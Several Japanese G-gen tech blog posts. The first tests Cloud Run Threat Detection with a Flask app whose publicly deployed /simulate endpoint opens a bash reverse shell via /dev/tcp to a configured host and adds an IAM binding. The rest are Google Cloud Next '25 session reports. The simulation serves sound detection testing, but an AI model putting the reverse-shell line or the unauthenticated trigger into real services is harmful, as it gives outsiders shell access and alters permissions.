G-gen の䞉浊です。圓蚘事では、 Cloud Run Threat Detection を怜蚌した結果を玹介したす。 抂芁 Cloud Run Threat Detection ずは 2぀の怜出機胜 Artifact Analysis ずの違い 泚意事項 怜蚌内容 怜蚌 脅嚁怜出機胜の有効化 Cloud Run のデプロむ ディレクトリ構成 Dockerfile main.py requirements.txt 疑䌌攻撃の実行ず怜出結果の確認 抂芁 Cloud Run Threat Detection ずは Cloud Run Threat Detection ずは、Cloud Run で実行されおいるアプリケヌションに察する攻撃や䞍正な操䜜ログを怜出するセキュリティ機胜です。実行䞭の Cloud Run アプリケヌションを継続的にモニタリングし、ニアリアルタむムで Security Command Center以䞋、SCCに怜出結果を報告したす。 怜査察象リ゜ヌスは、 Cloud Run サヌビス および Cloud Run ゞョブ です。 参考 : Cloud Run の脅嚁怜出の抂芁 圓機胜は、SCC の プレミアムティア たたは ゚ンタヌプラむズティア でのみ利甚可胜です。 参考 : Security Command Center のサヌビスティア 参考 : Security Command Centerを培底解説。Google Cloud(GCP)の脆匱性を自動怜知 - G-gen Tech Blog - Security Command Center ずは なお圓蚘事の怜蚌結果やスクリヌンショットは、2025幎4月珟圚プレビュヌ期間䞭のものです。圓機胜は2025幎9月に䞀般公開GAされたした。 2぀の怜出機胜 Cloud Run Threat Detectionには、 ランタむム怜出 ず コントロヌルプレヌン怜出 の2皮類の怜出方法が含たれおおり、違いは以䞋のずおりです。 怜出皮類 察応しおいる Cloud Run の䞖代 具䜓的な怜出内容の䟋 ランタむム怜出 第2䞖代のみ コンテナ゚スケヌプ、悪意のあるバむナリやスクリプトの実行、偵察ツヌルの䜿甚など コントロヌル プレヌン怜出 第1䞖代・第2䞖代 クリプトマむニングの兆候や、䞍審な IAM 蚭定倉曎などの操䜜ログを怜出 参考 : Cloud Run の脅嚁怜出の抂芁 - 怜出項目 Artifact Analysis ずの違い 類䌌機胜ずしお、Artifact Registry に保存されたコンテナむメヌゞの脆匱性をスキャンする Artifact Analysis がありたす。 䞡機胜の違いは以䞋のずおりで、怜出タむミングや察象、目的が異なり、盞互に補完しあいたす。 機胜名 怜出察象 怜出タむミング ナヌスケヌス Cloud Run の脅嚁怜出 コンテナ本䜓 実行時ランタむム 本番環境における異垞怜知・䞍正アクセスの監芖 Artifact Analysis コンテナむメヌゞ むメヌゞの Push 時、たたは手動スキャン時 リリヌス前のセキュリティチェック 参考 : Artifact Analysis の抂芁 泚意事項 圓機胜を組織たたはプロゞェクトで有効にするず、 第 1 䞖代の実行環境を指定した Cloud Run サヌビスは新たに䜜成できなくなりたす 。事前にご確認ください。 Cloud Run 脅嚁怜出を有効にするず、第 1 䞖代の実行環境で実行される Cloud Run サヌビスたたはサヌビス リビゞョンを䜜成できたせん。Cloud Run サヌビスは第 2 䞖代の実行環境を䜿甚する必芁がありたす。Cloud Run の脅嚁怜出を有効にする前に、第 2 䞖代の実行環境でワヌクロヌドをテストするこずをおすすめしたす。 参考 : ランタむム怜出機胜でサポヌトされおいる実行環境 各実行環境の特城に぀いおは、以䞋の蚘事および公匏ドキュメントをご参照ください。 参考 : サヌビス実行環境に぀いお 参考 : Cloud Runを培底解説 - G-gen Tech Blog - コンテナ実行環境䞖代 怜蚌内容 怜蚌手順は次のずおりです。 項番 内容 説明 1 脅嚁怜出機胜の有効化 怜蚌プロゞェクトで SCC のプレミアムティアを有効化し、Cloud Run の脅嚁怜出機胜を有効化する 2 Cloud Run のデプロむ 脅嚁怜出察象ずなる Cloud Run サヌビスをデプロむする 3 疑䌌攻撃の実行ず怜出結果の確認 コンテナ内で疑䌌的な悪意のある操䜜を行い、ランタむム怜出ずコントロヌルプレヌン怜出による怜知を確認する 怜蚌 脅嚁怜出機胜の有効化 プロゞェクトセレクタで怜蚌甚プロゞェクトが遞択されおいるこずを確認したあず、[セキュリティ] > [リスクの抂芁] から [プレミアムぞ切り替え] を遞択したす。 リスクの抂芁を遞択 プレミアムぞ切り替えを遞択 プレミアム ティア が遞択されおいるこずを確認し、[次ぞ] を遞択したす。 ティアの確認ず次ぞを遞択 以䞋を蚭定し、[ティアを曎新] を遞択したす。 Cloud Run の脅嚁怜出 有効にする 脅嚁怜出の有効化ずプレミアムティアぞの倉曎 階局が Security Command Center Premium ず衚瀺されるこずを確認したす。 プレミアムティアぞの倉曎確認 Cloud Run のデプロむ ディレクトリ構成 ディレクトリ構成は以䞋の通りです。 . ├── Dockerfile ├── main.py └── requirements.txt Dockerfile FROM google/cloud-sdk:slim   # 䜜業ディレクトリ WORKDIR /app   # Python 関連ツヌルをむンストヌル RUN apt-get update && \ apt-get install -y python3 python3-venv python3-pip && \ apt-get clean   # Python 仮想環境を構築しお有効化 RUN python3 -m venv /app/venv ENV PATH= "/app/venv/bin:$PATH"   # Flask のむンストヌル COPY requirements.txt . RUN pip install --no-cache-dir -r requirements.txt   # アプリケヌションコヌド COPY main.py .   # ポヌト指定Cloud Run ENV PORT=8080   # アプリ起動 CMD [ " python ", " main.py " ] main.py この Flask アプリは、Cloud Run の脅嚁怜出機胜を怜蚌するためのものです。 /simulate にアクセスするず、リバヌスシェル通信ず IAM 蚭定倉曎を疑䌌的に実行したす。 from flask import Flask import os import subprocess import logging   # Flask アプリの起動 app = Flask(__name__) logging.basicConfig(level=logging.INFO)   # ========================================== # 必須の環境倉数を取埗 # デプロむ時に --set-env-vars で蚭定したす # ========================================== REVERSE_SHELL_HOST = os.environ.get( "REVERSE_SHELL_HOST" ) # 疑䌌リバヌスシェルの接続先ホスト PROJECT_ID = os.environ.get( "PROJECT_ID" ) # GCP プロゞェクト ID PROJECT_NUMBER = os.environ.get( "PROJECT_NUMBER" ) # GCP プロゞェクト番号数倀 SERVICE_NAME = os.environ.get( "SERVICE_NAME" ) # この Cloud Run サヌビス名 REGION = os.environ.get( "REGION" , "asia-northeast1" ) # リヌゞョンデフォルト: 東京   # リバヌスシェル甚の接続ポヌト固定 REVERSE_SHELL_PORT = "80"   # ========================================== # 必須環境倉数のチェック # ========================================== if not all ([REVERSE_SHELL_HOST, PROJECT_ID, PROJECT_NUMBER, SERVICE_NAME]): raise EnvironmentError ( "環境倉数 REVERSE_SHELL_HOST, PROJECT_ID, PROJECT_NUMBER, SERVICE_NAME をすべお蚭定しおください。" )   # ========================================== # GET / → 簡易ステヌタス確認甚 # ========================================== @ app.route ( "/" ) def index (): return "Cloud Run Threat Detection simulation is ready. \n "   # ========================================== # GET /simulate # 疑䌌リバヌスシェルランタむム怜出ず IAM 操䜜コントロヌルプレヌン怜出を䞀括実行 # ========================================== @ app.route ( "/simulate" ) def simulate (): logging.warning(f "🚚 Simulating reverse shell to {REVERSE_SHELL_HOST}:{REVERSE_SHELL_PORT}" )   # ✅ ランタむム怜出: 疑䌌リバヌスシェルを実行CLOUD_RUN_REVERSE_SHELL subprocess.run([ "bash" , "-c" , f "bash -i >& /dev/tcp/{REVERSE_SHELL_HOST}/{REVERSE_SHELL_PORT} 0>&1 || true" ])   # ✅ コントロヌル プレヌン怜出: IAM ポリシヌ倉曎CLOUD_RUN_SERVICES_SET_IAM_POLICY # デフォルトの GCE サヌビスアカりントを Cloud Run の Invoker に远加 default_sa = f "{PROJECT_NUMBER}-compute@developer.gserviceaccount.com" logging.warning(f "🔐 Binding default GCE SA ({default_sa}) to {SERVICE_NAME}" )   subprocess.run([ "gcloud" , "run" , "services" , "add-iam-policy-binding" , SERVICE_NAME, "--member" , f "serviceAccount:{default_sa}" , "--role" , "roles/run.invoker" , "--region" , REGION, "--project" , PROJECT_ID ])   logging.warning( "✅ Threat simulation completed." ) return ( f "Reverse shell simulated to {REVERSE_SHELL_HOST}:{REVERSE_SHELL_PORT} \n " f "IAM policy updated for {default_sa} on {SERVICE_NAME} \n " )   if __name__ == "__main__" : port = int (os.environ.get( "PORT" , 8080 )) app.run(host= "0.0.0.0" , port=port) requirements.txt flask 以䞋コマンドで Container Threat Detection API を有効化したす。 # プロゞェクト ID export PROJECT_ID = " myproject "   # API を有効化 gcloud services enable containerthreatdetection.googleapis.com \ --project = $PROJECT_ID 䞊蚘 API が無効な堎合、以䞋ログが出力され、脅嚁怜知が実斜されたせんので、ご泚意ください。 textPayload: "W0410 08:36:54.096441 8 ktdclient.go:334] ktdclient connection closed unexpectedly: failed to receive initial response from ktd service: rpc error: code = PermissionDenied desc = Container Threat Detection API has not been used in project XXXXX before or it is disabled. Enable it by visiting https://console.developers.google.com/apis/api/containerthreatdetection.googleapis.com/overview?project=XXXXX then retry. If you enabled this API recently, wait a few minutes for the action to propagate to our systems and retry." 以䞋のコマンドで Cloud Run サヌビスをデプロむしたす。 # むメヌゞず Cloud Run サヌビス名 export SERVICE_NAME =cloudrun-test   # Cloud Run から TCP/80 に接続するテスト甚ホストを指定したす䟋dev.yourdomain.com # リバヌスシェルの動䜜を再珟するため、HTTP 通信が可胜な怜蚌甚 FQDN を䜿甚しおください export REVERSE_SHELL_HOST =dev.yourdomain.com   # プロゞェクト ID ず番号を自動取埗 export PROJECT_ID = $( gcloud config get-value project ) export PROJECT_NUMBER = $( gcloud projects describe $PROJECT_ID --format =" value(projectNumber) " )   # Cloud Run サヌビスのデプロむ gcloud run deploy $SERVICE_NAME --source . \ --region = asia-northeast1 \ --allow-unauthenticated \ --set-env-vars REVERSE_SHELL_HOST = $REVERSE_SHELL_HOST , PROJECT_ID = $PROJECT_ID , PROJECT_NUMBER = $PROJECT_NUMBER , SERVICE_NAME = $SERVICE_NAME 疑䌌攻撃の実行ず怜出結果の確認 Cloud Run サヌビスぞアクセスしたす。 # Cloud Run サヌビスの URL を環境倉数に蚭定 export CLOUD_RUN_URL = $( gcloud run services describe $SERVICE_NAME \ --region = asia-northeast1 \ --project = $PROJECT_ID \ --format =" value(status.url) " )   # Cloud Run サヌビスの /simulate ゚ンドポむントぞアクセス curl -s " ${CLOUD_RUN_URL} /simulate " [セキュリティ] >[怜出結果] から [Cloud Run Threat Detection] ず [Event Threat Detection] を遞択し、脅嚁を怜出しおいるこずを確認したす。 怜出した脅嚁の確認 脅嚁の詳现ランタむム怜出 脅嚁の詳现コントロヌル プレヌン怜出 䞉浊 健斗 (蚘事䞀芧) クラりド゜リュヌション郚 2023幎10月よりG-genにゞョむン。元オンプレ䞭心のネットワヌク゚ンゞニア。ネットワヌク・セキュリティ・唐揚げ・蟛いものが奜き。
G-gen の山厎です。本蚘事は Google Cloud Next '25 in Las Vegas の1日目に行われたブレむクアりトセッション「 What’s new with IAM and Org Policy : Access risk, at-scale governance and AI 」のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 Google Cloud のセキュリティプラットフォヌム Google Cloud のセキュリティプラットフォヌムの党䜓像 Resource Management の新機胜 Application management with Resource Manager Cloud Governance の新機胜 Custom Constraints の察象サヌビスの拡充 Google Cloud Security Baseline Identity の新機胜 Workforce Identity Federation の察象補品の拡充 Keyless access to Google Cloud APIs using X.509 certificates Managed Workload Identity Access Management の新機胜 アクセス管理の珟状 IAM Deny、Privileged Access Manager のサヌビス匷化 Privileged Access Manager のサヌビス匷化 Gemini-powered-Role Picker Entitlement Management IAM Admin Center Access Risk の新機胜 Automatic ReAuth for 11 sensitive actions ITDR with Context-Aware Access 関連蚘事 セッションの抂芁 本セッションでは、Google Cloud のセキュリティプラットフォヌムに関する新機胜の玹介が行われたした。 Google Cloud のセキュリティプラットフォヌム Google Cloud のセキュリティプラットフォヌムの党䜓像 Google Cloud のセキュリティプラットフォヌムは以䞋の5぀の軞で構成されおいたす。 Resource Management Google Cloud 䞊、組織、フォルダ、プロゞェクトのツリヌで構成され、Google Cloud で䜜成されるリ゜ヌスを実際の組織階局、郚門、チヌム、環境本番環境/開発環境に基づいお敎理、管理を行う Cloud Governance リ゜ヌス䜜成・倉曎時に、適切な構成ずセキュリティ䜓制を保蚌する Identity 人ず人以倖マシンやサヌビスアカりント等の ID の登録、管理を行う Access Management どの ID がどのリ゜ヌスにアクセスできるかを制埡する Access Risk ID がログむン埌、そのセッションのリスクを継続的に評䟡・管理を行う たた、これらの芁玠は盞互に連携し、Gemini による AI 機胜で匷化されるこずで、より効果的なセキュリティ運甚を可胜にするずしたした。 Resource Management の新機胜 Application management with Resource Manager 組織のリ゜ヌス階局内のフォルダを甚いたアプリケヌション管理機胜がプレビュヌ公開されたした。 フォルダ階局䞋の耇数のプロゞェクトにたたがったアプリケヌションの管理をするこずができ、 ビゞネス芖点で意味のある単䜍でアプリケヌションの管理が可胜 ずなりたす。 参考 : Managing applications in a folder Cloud Governance の新機胜 Custom Constraints の察象サヌビスの拡充 Custom Constraints ずは、ナヌザヌが自ら䜜成できる制玄です。 今たでは、Custom Constraints が䜿甚できるサヌビスは4぀でしたが、珟圚は、57のサヌビスが䞀般公開GAされおおり、5぀のサヌビスがプレビュヌ公開であるずしたした。 たた、今幎の目暙ずしおは、100〜125のサヌビスを察象にしたいずしたした。 参考 : Custom constraints たた、Gemini を甚いた Custom Constraints の䜜成が可胜ずなり、Gemini に芁求事項を䌝えるこずで Custom Constraints の䜜成、及びシミュレヌタヌでのテスト結果が共有されるずしたした。 Google Cloud Security Baseline 2024幎初頭以降に新しく䜜成された Google Cloud 組織では、いく぀かの制玄がはじめから有効化されるようになりたした。 参考 : デフォルトで安党な組織リ゜ヌスの管理 Identity の新機胜 Workforce Identity Federation の察象補品の拡充 珟圚、95% 以䞊の Google Cloud 補品が Workforce Identity Federation のサポヌト範囲であるずしたした。 95% ずしおいる理由は、新しい補品が垞に構築されおおり、プレビュヌ等の段階を経おいる間は、Workforce Identity Federation のサポヌト察象倖である可胜性があるためであり、䞀般公開GAされた補品に察しおは、Workforce Identity Federation をも぀こずを矩務付けおいるずしたした。 たた、Workforce Identity Federation においお、MFA ずセッション長の匷制を導入予定ずしたした。 Keyless access to Google Cloud APIs using X.509 certificates X.509 蚌明曞を甚いた Google Cloud API ぞのキヌレスアクセスが䞀般公開GAされたした。 これによりワヌクロヌドはサヌビスアカりントキヌを発行するこずなく、有効期間が短い認蚌情報を䜿甚しお Google Cloud APIs にアクセスするこずが可胜ずなりたす。 参考 : X.509 蚌明曞を䜿甚しお Workload Identity 連携を構成する Managed Workload Identity Managed Workload Identity が GCE、GKE 向けにプレビュヌ版ずしお提䟛されたした。Cloud Run は近日公開予定。 こちらも X.509 蚌明曞を䜿甚しおおり、有効期間が短い認蚌情報を䜿甚しおワヌクロヌド間の認蚌を確実に行うこずができたす。 参考 : マネヌゞド ワヌクロヌド ID の抂芁 Access Management の新機胜 アクセス管理の珟状 Microsoft のマルチクラりドセキュリティレポヌトの内容の共有がありたした。 そのレポヌトは、51,000皮類の暩限を2億900䞇の ID に察しお付䞎しおいるが、その䞭で䜿甚されおいるものはわずか 2% であり、 50% 以䞊が高リスク であるずし、倧芏暡なセキュリティ問題を匕き起こす可胜性があるものだずしたした。 この珟状に察しお、Google Cloud は以䞋2点の内容で察凊しおいくずしたした。 Defense-in-depth for IAM IAM Deny Privileged Access Manager Principal Access Boundary Improve IAM hygiene 暩限付䞎時Day 0、暩限付䞎埌Day Nにおける適切な暩限付䞎 IAM Deny、Privileged Access Manager のサヌビス匷化 IAM Deny は珟圚73のサヌビスでサポヌトされおおり、シミュレヌタヌはプレビュヌ公開、トラブルシュヌタヌは䞀般公開GAであるずしたした。 たた、Privileged Access Manager は珟圚30のサヌビスでサポヌトされおおり、シミュレヌタヌ、トラブルシュヌタヌ共にプレビュヌ公開であるずしたした。 Privileged Access Manager のサヌビス匷化 暩限の付䞎を行う際の承認者を耇数蚭定するこずができるようになりたした。 これにより、ティア1、ティア2ずいった段階を螏んだ承認を行うこずができたす。 たた、暩限の䜜成、承認時に暩限を䞎える範囲を特定のフォルダやプロゞェクトにのみ䞎えるこずが可胜ずなりたした。 Gemini-powered-Role Picker Gemini-powered-Role Picker がプラむベヌトプレビュヌずしお提䟛されたした。 Gemini を甚いお自然蚀語で必芁なロヌルの特定が可胜ずなり、暩限を付䞎するタむミングDay 0から実行に必芁な暩限のみを䞎えるこずが容易ずなりたす。 Entitlement Management Entitlement Management に Azure をプレビュヌ公開予定であるずしたした。 耇数のクラりド プラットフォヌム䞊のデプロむメントでどの ID がどのリ゜ヌスにアクセスできるかを管理し、誀った構成によっお生じる朜圚的な脆匱性を軜枛できたす。 IAM Admin Center IAM Admin Center がプレビュヌ公開予定ずしたした。 圹割に応じたダッシュボヌドが衚瀺され、セキュリティに関する掞察や掚奚事項、シュミレヌション䞭やドラむラン状態の暩限の照䌚等ずいった、組織党䜓のセキュリティ匷化を支揎したす。 Access Risk の新機胜 Automatic ReAuth for 11 sensitive actions Automatic ReAuth がプレビュヌ公開されたした。 ナヌザヌが機密性の高いアクションを行った際に、ナヌザヌに再認蚌を匷制するこずができたす。珟圚は11個の機密性の高いアクションが察象 機密性の高いアクションを繰り返し実斜するナヌスケヌスを考慮し、再認蚌埌15分間は機密性の高いアクションを行ったずしおも再認蚌は䞍芁ずする蚭定も行うこずができたす。 ITDR with Context-Aware Access ITDRIdentity Threat Detection and Response with Context-Aware Access が近日公開予定ずしたした。 ナヌザヌの様々な行動ログむン堎所、時間、操䜜内容などを瀺す60皮類以䞊の情報を分析し、通垞ずは異なる疑わしいアクションやIDに関する脅嚁を特定したす。 怜出されたリスクレベルに応じお、システムでの察凊を可胜ずしたす。倚芁玠認蚌、再認蚌、アクセス拒吊 等 関連蚘事 blog.g-gen.co.jp 山厎 曜 (蚘事䞀芧) クラりド゜リュヌション郚 元は日系倧手SIerにお金融の決枈領域のお客様に察しお、PMAP゚ンゞニアずしお、芁件定矩〜保守運甚たで党工皋に埓事。 Google Cloud Partner Top Engineer 2025 遞出。 Google Cloud å…š 12 資栌保有。 フルスタックな人材を目指し、日々邁進。 Follow @Akira_Yamasakit
G-gen の道䞋です。本蚘事は Google Cloud Next '25 in Las Vegas の 2日目に行われたスポットラむトセッション「 What​​’s next for security professionals 」のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 Google Unified SecurityGUSずは Google Security OperationsGoogle SecOps Data pipeline Management Mandiant Threat Defence Security Command CenterSCC AI Protection Model Armor が Vertex AI に統合 Compliance Manager Gemini in Security agent Google Chrome Enterprise Data Masking Employee phishing protection セッションの抂芁 本セッションでは、1日目のキヌノヌト基調講挔で発衚された Google Unified Security GUSをはじめ、GUS を構成する Google Security Operations、Security Command Center、Google Chrome Enterprise、Mandiant Consulting の各サヌビス玹介ず、アップデヌトの説明がありたした。 圓蚘事は、同セッションの内容ず、䞀郚に以䞋の蚘事の情報を組み合わせお玹介しおいたす。 参考 : Driving secure innovation with AI and Google Unified Security Google Unified SecurityGUSずは Google Unified Security GUSは、既存゜リュヌションである Google Security OperationsGoogle SecOps、Google Chrome Enterprise旧 BeyondCorp、Mandiantセキュリティに関するコンサルティング、Security Command Center、Google Threat Intelligence を統合した゜リュヌションです。 参考 : Google Cloud Next '25 速報レポヌト - キヌノヌト1日目 - G-gen Tech Blog - Google Unified SecurityGUS Google Unified Security には以䞋ような特城がありたす。 Google の倧芏暡むンフラ䞊で動䜜し、Gemini を掻甚したセキュリティプラットフォヌム Google補品ずサヌドパヌティのデヌタを統合し、セキュアなデヌタファブリックを構築可胜 デヌタファブリックは、可芖性、怜玢性、AI のために利甚 Google のThreat Intelligence やコンテキストグラフなどでデヌタを自動的に補匷 SecOps 環境ずクラりドセキュリティ環境を統合し、セキュリティワヌクフロヌを最適化 Gemini を掻甚した自動化の仕組みによっお、䜜業負荷を軜枛し、効率を向䞊 Google Security OperationsGoogle SecOps Google Security OperationsGoogle SecOpsは、倧芏暡なセキュリティデヌタず分析を網矅した、TDIRThreat Detection、Investigation、 Responseワヌクフロヌを備えたサヌビスです。セッションでは、Google Security Operations を構成する機胜のアップデヌトが、耇数発衚されたした。 Data pipeline Management Data pipeline Management 䞀般公開。以䞋、GAは、Google SecOps で収集されたセキュリティ関連デヌタを分析するために、倉換、フィルタリング、機密デヌタの削陀などを行うデヌタパむプラむン機胜です。 Mandiant Threat Defence Mandiant Threat Defence は、SecOps に組み蟌たれおいるコンサルティングサヌビスです。Mandiant チヌムのセキュリティ専門家が、脅嚁ハンティング、コンテンツ䜜成、調査などを支揎したす。 Security Command CenterSCC Security Command CenterSCCでも、耇数の機胜のアップデヌトが発衚されたした。 AI Protection AI Protection は、環境から AI ワヌクロヌドを怜出しおむンベントリ化したり、AI モデルやデヌタの保護、AI アプリケヌションぞの攻撃の怜出、調査、察応が可胜になる機胜です。 AI Protection は Security Command Center に組み蟌たれおおり、埌述する Model Armor ずも組み合わせお利甚したす。 参考 : Announcing AI Protection: Security for the AI era Model Armor が Vertex AI に統合 Model Armor は、AI Protection の䞀郚で、プロンプトずレスポンスに察しおフィルタリングを行い、セキュリティコントロヌルを適甚できたす。今回、Model Armor が Vertex AI に盎接統合 されるこずが発衚されたした。 埓来、Model Armor では、アプリケヌション偎から Model Armor API にプロンプトやレスポンスを投入する必芁がありたしたが、この統合により、゜ヌスコヌドを倉曎するこずなく、プロンプトやレスポンスが Model Armor にルヌティングされるよう蚭定できたす。 参考 : Model Armorを培底解説 - G-gen Tech Blog Compliance Manager Compliance Manager は、ポリシヌの定矩や、統制機胜の適甚、モニタリングなどを統合するワヌクフロヌです。Assured Workloads をベヌスずしおおり、監査察応などに掻甚できたす。2025幎6月にプレビュヌ版が公開予定です。 Gemini in Security agent Gemini in Security agent は、怜出゚ンゞニアリング、Playbook の䜜成、コヌド解析、リバヌス゚ンゞニアリングを実行できるようにトレヌニングされた゚ヌゞェントです。この Gemini in Security agent は、Google SecOps ず Google Threat Intelligence ぞ導入されたす。 Google SecOps では、 アラヌトトリアヌゞ゚ヌゞェント alert triage agentが、Google Threat Intelligence には マルりェア分析゚ヌゞェント malware analysis agentが、それぞれ導入されたす。 Gemini in Security agent を掻甚するこずで、環境蚭定の䜜業負荷を軜枛し、安党な環境を実珟するこずができたす。 Google Chrome Enterprise Chrome Enterprise Premium でも、新しい機胜远加が発衚されたした。 Data Masking Data Masking は、䌁業ナヌザヌがブラりザで機密デヌタを衚瀺する際に、マスキングを行う機胜です。 Employee phishing protection Employee phishing protection は、フィッシング詐欺ぞの察策機胜です。フィッシングによる、認蚌情報の取埗を阻止するこずができたす。 この機胜では、Google のセヌフブラりゞングのデヌタが掻甚されおいたす。 道例 千晃 (蚘事䞀芧) クラりド゜リュヌション郚 倧阪府圚䜏。Google Cloud Certification å…š11冠 Google Cloud にはいろいろなサヌビス、プロダクトがあっお楜しいですね。 趣味はテニス、オンラむンゲヌム䞖界を救ったり、魚を釣ったり、歊噚防具を䜜ったり Follow @Chiaki_Michi
G-gen の暪柀です。本蚘事は Google Cloud Next '25 in Las Vegas の2日目に行われたブレむクアりトセッション「 Transform team collaboration with Gemini in Google Chat and Meet 」のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 Google Meet Take Notes for Me Studio Effect Capture next steps and assign tasks In-Meeting Gemini Google Chat Gemini in the chat side panel Summaries in home Translate for me Document Summaries Gemini joins the conversation 顧客事䟋 関連蚘事 セッションの抂芁 本セッションでは、Google Workspace で利甚できる、Google Meet ず Google Chat の Gemini に぀いお、最新機胜の玹介が行われたした。 Google Meet Take Notes for Me すでに Google Workspace で利甚できるようになっおいる最新機胜の1぀が、 Take Notes for Me です。この機胜を䜿えば、䌚議の議事録をワンクリックで自動生成し、Google カレンダヌの予定に自動で添付されたす。 議事録は Google ドキュメントずしお保存され、䌚議で話された内容の芁玄やアクションアむテムが敎理された状態で提䟛されたす。Take Notes for Me は珟圚、日本語を含む8ヶ囜語に察応しおいたす。 Studio Effect ビデオ䌚議の䜓隓をさらに向䞊させるのが、 Studio Effect ず呌ばれる機胜です。バヌチャル背景を䜿甚した際の髪の毛の自然な描写や、ネットワヌク環境が䞍安定なずきでも明瞭な音声を届ける機胜、そしお耇数人が同じオフィス内でそれぞれのラップトップから参加しおも゚コヌを防ぐ Adaptive Audio など、参加者党員が快適に䌚議に集䞭できるよう配慮されおいたす。 Capture next steps and assign tasks 䌚議䞭に話された重芁なタスクや ToDo を取りこがさないよう、䌚議の発蚀内容を Gemini が自動的に分析し、アクションアむテムずしお抜出しおくれたす Capture next steps and assign tasks 。 ナヌザヌはワンクリックでそれらを Google タスクに远加するこずができ、蚘録ず実行のギャップを埋めるこずができたす。 In-Meeting Gemini 今埌リリヌスが予定されおいる機胜ずしお、 In-Meeting Gemini が玹介されたした。この機胜では、䌚議䞭に Gemini に盎接質問したり、䌚議の芁玄をリアルタむムで取埗したりするこずが可胜になりたす。 遅れお䌚議に参加した堎合でも、Gemini に質問するこずで芁点をすぐに把握でき、たた䌚話の文脈を螏たえた䞊での甚語解説や発蚀の背景情報も提䟛されたす。 Google Chat Gemini in the chat side panel 昚幎の Next で発衚された、Google Chat 内でのサむドパネル機胜 Gemini in the chat side panel が利甚可胜になりたした。 Google Chat のサむドパネルにより、チヌムメンバヌずの䌚話を芁玄したり、アクションアむテムを取埗したり、Web から情報を取埗するこずが可胜になりたす。 Summaries in home Google Chat のホヌム画面で、未読の䌚話だけでなく、すべおの䌚話の抂芁を芁玄するこずが可胜になりたす Summaries in home 。 これにより、Google Chat 内のすべおの䌚話ずすべおの出来事を画面遷移するこずなく確認できたす。 Translate for me Translate for me 機胜では、Google Chat 䞊で、120以䞊の蚀語間でのリアルタむム翻蚳機胜が提䟛されたす。察応蚀語が拡匵され、さらに7぀の蚀語スペむン語、ポルトガル語、むタリア語、ドむツ語、フランス語、日本語、韓囜語が远加されたした。 ホヌム画面での翻蚳機胜も、今埌数ヶ月以内に展開予定です。 Document Summaries Google Chat で共有された Google Workspace ファむルの抂芁を、ファむルを開かずにサむドパネルで確認するこずが可胜になりたす Document Summaries 。 確認ができるファむルはアクセス暩が付䞎されおいるものだけです。 Gemini joins the conversation Google Chat 内で Gemini にメンションするこずで、Gemini が䌚話に加わり、芁玄やアクションアむテムの敎理、過去メッセヌゞの重芁情報の確認に圹立おるこずができたす Gemini joins the conversation 。 チヌムごずにチャットスペヌスを䜜成しおいる堎合などに、チヌム党䜓が Gemini の回答を芋お、必芁なアクションを取るこずが可胜になりたす。 顧客事䟋 セッションの埌半では、Motorola Solutions の Jason Raps 氏が登壇し、実際の導入事䟋が共有されたした。Gemini を早期からパむロット導入し、91が高いむンパクトを感じ、週あたり最倧6時間の業務効率化を実珟したずいうデヌタが玹介されたした。特に䌚議に倚く参加する瀟員が「Take Notes for Me」によっお倧幅に効率化されたようです。 珟圚、党埓業員2侇2千人に Gemini が展開され、わずか60日で67ずいう高い採甚率を達成。チャット空間の数が膚倧な䞭、Gemini がその情報を芁玄・敎理するこずで、埓業員が情報を芋逃すこずなくキャッチアップできるようになったずのこずです。 関連蚘事 blog.g-gen.co.jp 暪柀 綜䞀 (蚘事䞀芧) 事業開発郚カスタマヌサクセス課 英文孊科からITの䞖界ぞ。Google Workspace 専任サポヌトから Google Workspace のカスタマヌサクセスぞロヌルが代わり日々奮闘䞭。週5でゞムに通う。
G-gen の道䞋です。本蚘事は Google Cloud Next '25 in Las Vegas の 1日目に行われたブレむクアりトセッション「 What’s new with Cloud Storage 」のレポヌトです。 他の Google Cloud Next '25 の関連蚘事は Google Cloud Next '25 カテゎリ の蚘事䞀芧からご芧いただけたす。 セッションの抂芁 導入 6぀の䞻芁なトピック AIずデヌタレむク Rapid Storage Managed Lustre ストレヌゞむンテリゞェンス デヌタレむク向け機胜 Anywhere Cache ファむルデヌタ移行 Google Cloud NetApp Volumes Filestore Backup クロヌゞング 関連蚘事 セッションの抂芁 本セッションでは、Cloud StorageGCSの最新情報ずしお、6぀の䞻芁なトピックが玹介されたした。 AIずデヌタレむク ストレヌゞむンテリゞェンス デヌタレむク向け機胜 ファむルデヌタ移行 Filestore Backup 導入 Cloud Storage は芏暡、信頌性、耐久性、コスト効率に優れおおり、あらゆる芏暡の䌁業やスタヌトアップで利甚されおいる䞀方で、AI の登堎以降、ストレヌゞに察する芁求スルヌプット、IOPS、䜎レむテンシ、䞊列凊理などが倉化しおいるず話したした。 6぀の䞻芁なトピック AIずデヌタレむク AI の成功にはスピヌドずスケヌルが重芁であるため、Cloud Storage はハむパフォヌマンスストレヌゞの機胜を匷化しおいるずし、 Rapid Storage ず Managed Lustre の2぀が玹介されたした。 Rapid Storage ず Managed Lustre 等に぀いおは、以䞋の蚘事でも玹介されおいたす。 参考 : High performance storage innovations for your AI workloads Rapid Storage Rapid Storage は、䜎レむテンシ、高スルヌプット、高 QPS を実珟するクラりドストレヌゞであり、Colossus ファむルシステムを API ずしお盎接利甚するこずができたす。 Cloud Storage がリヌゞョンレベルのオブゞェクトストレヌゞであるのに察しお、Rapid Storage はゟヌンレベルZonalのオブゞェクトストレヌゞです。 Managed Lustre DDN ずのパヌトナヌシップにより、クラりド䞊で Lustre をマネヌゞドサヌビスずしお提䟛するサヌビスで、倧芏暡なデヌタ分析や AI モデルのトレヌニング・掚論に最適であるず説明されたした。 ストレヌゞむンテリゞェンス ストレヌゞむンテリゞェンスStorage Intelligenceずは、デヌタ管理を効率化するためのツヌルであり、デヌタの理解、コスト管理、セキュリティ察策を支揎する機胜を備えおいたす。 デヌタレむク向け機胜 オヌプンデヌタレむクのアヌキテクチャCloud Storage + オヌプンテヌブルフォヌマット + 各皮コンピュヌト゚ンゞンが業界暙準ずなっおいるずし、 Anywhere Cache ずいう機胜が取り䞊げられたした。 Anywhere Cache Cloud Storage の Anywhere Cache では、デヌタを SSD バックのロヌカルキャッシュに配眮し、レむテンシ特にテヌルレむテンシを削枛する機胜であるず説明されたした。 